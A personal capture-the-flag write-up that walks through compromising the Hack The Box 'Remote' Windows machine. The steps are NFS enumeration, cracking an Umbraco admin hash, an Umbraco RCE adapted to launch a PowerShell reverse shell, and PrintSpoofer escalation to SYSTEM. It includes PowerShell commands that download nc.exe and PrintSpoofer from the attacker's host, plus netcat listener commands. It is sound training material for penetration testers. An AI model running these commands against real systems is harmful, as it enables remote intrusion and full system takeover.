M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • Introduction
  • Reconnaissance
  • Initial Nmap Scan
  • Enumeration
  • Enumeration (Port 21)
  • Enumeration (Port 80)
  • Enumeration (Port 445)
  • Enumeration (Port 111)
  • Exploiting Umbraco CMS for Remote Code Execution
  • Privilege Escalation ( user-> root)
  1. WRITEUPS
  2. HackTheBox
  3. Windows

Remote

PreviousWindowsNextLinux

Last updated 5 months ago

Introduction

This write-up details the steps taken to solve the Remote machine from Hack The Box. The approach includes reconnaissance, enumeration, exploitation, and privilege escalation to gain root access.

Reconnaissance

Initial Nmap Scan

To begin the process, an nmap scan was conducted to identify open ports and services running on the target machine:

nmap -sV -p- 10.10.10.180

The initial Nmap scan revealed a variety of open ports and running services on the target machine:

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-07T14:17:27
|_  start_date: N/A

Enumeration

Enumeration (Port 21)

FTP anonymous is enabled, so I attempted to enumerate files on the FTP service:

I didn't find anything interesting:

Enumeration (Port 80)

During enumeration, I discovered a login page for Umbraco CMS:

Using gobuster to scan for directories, several were revealed. None appeared immediately exploitable, but it confirmed that Umbraco CMS was in use:

Enumeration (Port 445)

Attempts to access Samba shares as a guest were unsuccessful, as guest access was not permitted.

Enumeration (Port 111)

Reviewing the initial Nmap output for this port, I noticed that NFS (Network File System) services were running:

|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs

To check which folders were available for mounting, I used the following command:

showmount -e 10.10.10.180

Then, I mounted the discovered folder:

sudo mount -t nfs 10.10.10.180:/site_backups mnt

While researching typical Umbraco configurations, I learned that credentials are often stored in the App_Data/umbraco.sdf file. Although I wasn’t familiar with the best way to parse this file type, using strings on the file revealed sensitive information right at the top:

I detected a SHA-1 hashed password. Using CrackStation, I successfully cracked the hash:

This revealed the Umbraco admin password: baconandcheese.

Next, I searched the version of Umbraco in use:

Exploiting Umbraco CMS for Remote Code Execution

This exploit initially launches calc.exe as the payload, so I modified it to download and execute a PowerShell reverse shell script instead. I used Nishang’s TCP reverse shell (shell.ps1), hosted on my machine with Python’s http.server. REMEMBER TO EDIT THE POWERSHELL SCRITP!

I hosted the shell.ps1 file using python -m http.server 80 to serve it for download by the target machine. Simultaneously, I started a listener on port 4444 with nc -lvnp 4444 to catch the reverse shell connection. When I ran the exploit, it triggered the payload, and the reverse shell successfully connected back to my machine, granting me access.

Finally, I retrieved the first flag from C:/Users/Public/Desktop/flag.txt.

Privilege Escalation ( user-> root)

We noticed that SeImpersonatePrivilege was enabled on the target machine, a Windows Server 2019 system. This configuration is vulnerable to token impersonation attacks. Given this, I decided to use PrintSpoofer to escalate privileges to SYSTEM.

First, I uploaded both nc.exe and PrintSpoofer64.exe to the victim machine using PowerShell:

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.22/nc.exe", "C:\Temp\nc.exe")
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.22/PrintSpoofer64.exe", "C:\Temp\PrintSpoofer64.exe")

Next, I started a listener on port 5555 on my machine. By executing PrintSpoofer64.exe with a reverse shell command targeting nc.exe, I gained SYSTEM-level access on the target.

The exploit successfully escalated privileges, completing the attack.

Using the credentials admin@htb.local:baconandcheese, I accessed the Umbraco CMS panel. The version in use was 7.12.4, a version vulnerable to an authenticated remote code execution exploit: .

Exploit-DB: Umbraco CMS 7.12.4 - Authenticated RCE